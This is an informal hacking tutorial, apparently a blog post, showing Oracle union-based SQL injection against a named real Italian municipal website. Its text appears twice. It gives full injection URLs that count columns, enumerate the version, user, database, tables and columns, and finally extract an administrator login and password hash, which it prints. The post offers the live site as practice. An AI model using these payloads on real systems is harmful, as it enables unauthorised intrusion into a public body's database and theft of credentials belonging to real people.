Hello guys this is a tutorial about Oracle based SQL injection
Here is the site to learn with
Let's try order by
look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi
At order by 7 boom changes
Sei in : Home -> Citta' ->
Then no. of columns=6
Time to use union select
LOLS...Vulnerable column isn't shown..
Let's try all columns
nothing shown wrong column
word congress shown again..This is the right column
VERSION
CORE 9.2.0.6.0 Production
CURRENT USER
WWWTARANTO
CURRENT DATABASE
CSTTA
Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.
54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE
N.B:you can also use the following command
To find the next column of table TB_ALBO
54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE
using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.
MOVING TO NEXT TABLE
54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
Sharing this because its an ORACLE SQL injection
hope you like this
Here is the site to learn with
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 Let's try order by
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1 look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi
At order by 7 boom changes
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207 Then no. of columns=6
Time to use union select
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null LOLS...Vulnerable column isn't shown..
Let's try all columns
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version nothing shown wrong column
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version word congress shown again..This is the right column
VERSION
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select NULL,banner,NULL,NULL,NULL,NULL from v$version--CORE 9.2.0.6.0 Production
CURRENT USER
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select NULL,user,NULL,NULL,NULL,NULL from dual--WWWTARANTO
CURRENT DATABASE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--CSTTA
Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS--54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE
N.B:you can also use the following command
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS--To find the next column of table TB_ALBO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) ||
CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) ||
CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
Code:
CHR(68) || CHR(65) || CHR(84) ||
CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) ||
CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) =
DATA_ESECUZIONE54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE
using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.
MOVING TO NEXT TABLE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) ||
CHR(65) || CHR(76) || CHR(66) || CHR(79)--54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) ||
CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) ||
CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) ||
CHR(73) || CHR(79) || CHR(78) || CHR(69)--54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from
TB_UTENTE--61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
Sharing this because its an ORACLE SQL injection
hope you like this
No comments:
Post a Comment